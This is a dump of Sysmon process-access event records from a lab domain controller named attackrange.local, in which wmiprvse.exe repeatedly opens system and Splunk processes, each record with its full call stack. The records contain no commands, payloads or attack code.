16:03:35.531{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029564Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.531{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029563Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.531{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029562Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.531{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029561Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.531{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029560Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.531{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029559Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.531{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029558Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.531{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029557Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.531{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029556Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.531{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029555Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.531{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029554Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029553Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029552Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029551Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029550Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029549Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029548Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029547Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029546Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029545Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program 